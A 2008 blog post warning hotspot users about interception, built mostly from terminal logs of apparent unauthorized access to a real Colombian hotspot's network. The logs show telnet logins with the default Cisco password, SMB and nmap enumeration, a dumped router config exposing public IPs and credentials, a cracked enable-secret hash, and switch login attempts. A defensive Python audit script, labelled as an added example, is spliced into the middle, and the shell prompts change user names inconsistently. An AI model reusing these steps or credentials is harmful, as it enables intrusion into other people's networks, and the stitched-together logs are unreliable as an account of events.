Saturday, January 26, 2008

Default passwords OR honeypot?

''' JANUARY 26 '''

It has always been said that default passwords can be dangerous, obviously if someone wants to abuse them.

Someone anonymous wrote to me and showed me this. I never found out who it was, I don't know what it means, and I don't understand the implications of the case. The only thing he tells me is that one shouldn't worry so much about the infrastructure itself, that one should worry about the users of that network and about man-in-the-middle attacks.
I thought about that and came to the conclusion that it is true: many companies, beyond their own security, should care about the security of their users' information.

Off-topic ideas:

Hotspots will stay in fashion for a long time yet, the filters meant to let only valid users in are vulnerable, basic restrictions are obsolete, and JOINING administrative and public networks on hotspots makes the matter even more HOT.

In summary:
When you connect to a hotspot, please verify that you really are browsing through the hotspot and not through someone else, who will surely be capturing your cookies, your sessions, your passwords, your MSN chats, and your GTALK, AIM, AOL, ICQ and JABBER chats.

Summary 2:
You will never be able to know whether you are browsing through the hotspot or through someone else. Sorry, I am changing the summary to:
If you are on a hotspot, don't do important things, such as talking about yourself, saying what you think, arranging dates, describing yourself, or giving opinions in forums and chats. This will allow that user to profile you and, with that, find your passwords. The worst part is that he will always be able to find your passwords even if you change them, because he already knows you.


In one city (is it worse?):

debian:/# telnet 192.168.1.252
Trying 192.168.1.252...
Connected to 192.168.1.252.
Escape character is '^]'.


User Access Verification

Password:
Router_NAT_Puente_Aereo>enable
Password:
Router_NAT_Puente_Aereo#

then ...

cocolizo@debian:~$ smbclient -L 192.168.1.25
Password:
Domain=[GERENCIA] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
D$ Disk Default share
print$ Disk Printer Drivers
SharedDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
session request to 192.168.1.25 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[GERENCIA] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
perezgil@debian:~$

then ...

debian:/# nmap 192.168.1.252

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-11-16 06:18 COT
Interesting ports on 192.168.1.252:
Not shown: 1679 closed ports
PORT STATE SERVICE
23/tcp open telnet
MAC Address: 00:04:DD:0C:BD:F3 (Cisco Systems)

Nmap finished: 1 IP address (1 host up) scanned in 8.335 seconds
debian:/home/testing/Desktop/nmbscan-1.2.4# nmap 192.168.1.253

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-11-16 06:19 COT
Interesting ports on 192.168.1.253:
Not shown: 1678 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
MAC Address: 00:0A:41:23:AC:00 (Cisco Systems)

Nmap finished: 1 IP address (1 host up) scanned in 9.633 seconds
debian:/#

then ...

debian:/home/police/portatil# cat log4
Router_NAT_Puente_Aereo#show running-config
Building configuration...

Current configuration : 1458 bytes
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Router_NAT_Puente_Aereo
!
logging buffered 51200 warnings
enable secret 5 $1$e.68$du0SEpfijiA228uacanXU1
!
memory-size iomem 15
clock timezone BOGOTA -5
ip subnet-zero
!
!
ip name-server 200.13.249.101
ip name-server 200.75.78.78
ip dhcp excluded-address 192.168.1.1 192.168.1.11
!
ip dhcp pool pteaereo
network 192.168.1.0 255.255.255.0
dns-server 200.13.249.101 200.75.78.78
default-router 192.168.1.252
lease 0 0 30
!
ip dhcp-server 192.168.254.252
!
!
interface Ethernet0/0
description Conexion al Switch LAN WiFi
ip address 192.168.1.252 255.255.255.0
ip nat inside
load-interval 30
half-duplex
no cdp enable
hold-queue 100 out
!
interface FastEthernet0/0
description Conexion Back-to-back al CPE
ip address 201.232.227.234 255.255.255.248
ip nat outside
load-interval 30
speed auto
no cdp enable
hold-queue 100 out
!
ip nat translation max-entries 3000
ip nat pool pteaereo 201.232.227.235 201.232.227.237 netmask 255.255.255.248
ip nat inside source list 1 pool pteaereo overload
ip classless
ip route 0.0.0.0 0.0.0.0 201.232.227.233
no ip http server
ip pim bidir-enable
!
access-list 1 permit 192.168.1.0 0.0.0.255
no cdp run
!
call rsvp-sync
!
!
mgcp profile default
!
dial-peer cor custom
!
!
!
!
line con 0
line aux 0
line vty 0 4
password cisco
login
!
no scheduler allocate
end

Router_NAT_Puente_Aereo#

then ...

Just for checking, I know what it is.

debian:/home/john/john-1.7.2/run# cat ../../pass
root:$1$e.68$du0SEpfijiA228uacanXU1::::::::
debian:/home/john/portatil/john-1.7.2/run# ./john ../../pass
Loaded 1 password hash (FreeBSD MD5 [32/32])
cisco (root)
guesses: 1 time: 0:00:00:57 (3) c/s: 3165 trying: cisco
debian:/home/john/portatil/john-1.7.2/run# cat ./john.pot
$1$e.68$du0SEpfijiA228uacanXU1:cisco
debian:/home/john/portatil/john-1.7.2/run#
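
An added example, not part of the original post: a small Python audit that flags the settings visible in the running-config above (clear-text default vty password, type 5 MD5 enable secret, vty lines not limited to SSH, no vty access-class) and shows a hardened counterpart passing. The finding names, the short default-password list and the hardened sample are assumptions made for illustration.

```python
import re

DEFAULTS = {"cisco", "admin", "password"}  # illustrative, not exhaustive

# Constructed input: the security-relevant lines of the running-config above.
WEAK = """no service password-encryption
enable secret 5 $1$e.68$du0SEpfijiA228uacanXU1
line vty 0 4
password cisco
login
!
end"""

# Constructed hardened counterpart; the hash and ACL number are placeholders.
HARDENED = """service password-encryption
enable secret 9 $9$PLACEHOLDER
line vty 0 4
access-class 10 in
transport input ssh
login local
!
end"""

def audit(config):
    """Return sorted finding codes for an IOS-style configuration."""
    lines = [l.strip() for l in config.splitlines()]
    found, vty, in_vty = set(), [], False
    if "service password-encryption" not in lines:
        found.add("CLEARTEXT_STORAGE")       # line passwords stored unencoded
    for l in lines:
        if l.startswith("line "):
            in_vty = l.startswith("line vty")
        elif l in ("!", "end"):
            in_vty = False
        elif in_vty:
            vty.append(l)
        elif l.startswith("enable secret 5 "):
            found.add("MD5_ENABLE_SECRET")   # md5crypt: guessable offline if weak
    for l in vty:
        m = re.match(r"password (?:(\d) )?(\S+)", l)
        if m and m.group(1) in (None, "0"):  # no type digit or type 0 = clear text
            weak = m.group(2).lower() in DEFAULTS
            found.add("DEFAULT_VTY_PASSWORD" if weak else "PLAINTEXT_VTY_PASSWORD")
    if vty and "transport input ssh" not in vty:
        found.add("TELNET_NOT_EXCLUDED")     # nothing limits the vty to SSH
    if vty and not any(l.startswith("access-class ") for l in vty):
        found.add("NO_VTY_ACL")              # any source address may connect
    return sorted(found)

print(audit(WEAK), audit(HARDENED))
```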


In another city (is it better?):

debian:/home/scanner/portatil# cat nothing.txt
Trying 192.168.10.14...
Connected to 192.168.10.14.
Escape character is '^]'.

Catalyst 1900 Management Console
Copyright (c) Cisco Systems, Inc. 1993-1998
All rights reserved.
Enterprise Edition Software
Ethernet Address: 00-D0-C0-6D-CE-00

PCA Number: 73-3122-03
PCA Serial Number: FAB03183C6N
Model Number: WS-C1912-EN
System Serial Number: FAB0320T02R
Power Supply S/N: PHI031600M2
Power Supply P/N:
PCB Serial Number: FAB03183C6N,73-3122-03
-------------------------------------------------

1 user(s) now active on Management Console.

User Interface Menu

[M] Menus
[K] Command Line

Enter Selection: M
Enter password: ******

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

WARNING: Too many failed logon attempts.

debian:/home/babysister/portatil# cat ohyeah.txt
Trying 192.168.10.14...
Connected to 192.168.10.14.
Escape character is '^]'.

Catalyst 1900 Management Console
Copyright (c) Cisco Systems, Inc. 1993-1998
All rights reserved.
Enterprise Edition Software
Ethernet Address: 00-D0-C0-6D-CE-00

PCA Number: 73-3122-03
PCA Serial Number: FAB03183C6N
Model Number: WS-C1912-EN
System Serial Number: FAB0320T02R
Power Supply S/N: PHI031600M2
Power Supply P/N:
PCB Serial Number: FAB03183C6N,73-3122-03
-------------------------------------------------

1 user(s) now active on Management Console.

User Interface Menu

[M] Menus
[K] Command Line

Enter Selection: M
Enter password: ******

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

WARNING: Too many failed logon attempts.

debian:/home/fisher/portatil# cat Slog.txt
Trying 192.168.10.14...
Connected to 192.168.10.14.
Escape character is '^]'.


Catalyst 1900 Management Console
Copyright (c) Cisco Systems, Inc. 1993-1998
All rights reserved.
Enterprise Edition Software
Ethernet Address: 00-D0-C0-6D-CE-00

PCA Number: 73-3122-03
PCA Serial Number: FAB03183C6N
Model Number: WS-C1912-EN
System Serial Number: FAB0320T02R
Power Supply S/N: PHI031600M2
Power Supply P/N:
PCB Serial Number: FAB03183C6N,73-3122-03
-------------------------------------------------

1 user(s) now active on Management Console.

User Interface Menu

[M] Menus
[K] Command Line

Enter Selection: K


CLI session with the switch is open.
To end the CLI session, enter [Exit].

sw>show version
Cisco Catalyst 1900/2820 Enterprise Edition Software
Version V8.01.00
Copyright (c) Cisco Systems, Inc. 1993-1998
sw uptime is 11day(s) 03hour(s) 54minute(s) 49second(s)
cisco Catalyst 1900 (486sxl) processor with 2048K/1024K bytes of memory
Hardware board revision is 5
Upgrade Status: No upgrade currently in progress.
Config File Status: No configuration upload/download is in progress
15 Fixed Ethernet/IEEE 802.3 interface(s)
Base Ethernet Address: 00-D0-C0-6D-CE-00
sw>?
Exec commands:
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help system
ping Send echo messages
session Tunnel to module
show Show running system information
terminal Set terminal line parameters
sw>
sw>exit

CLI session with the switch is now closed.

Press any key to continue.
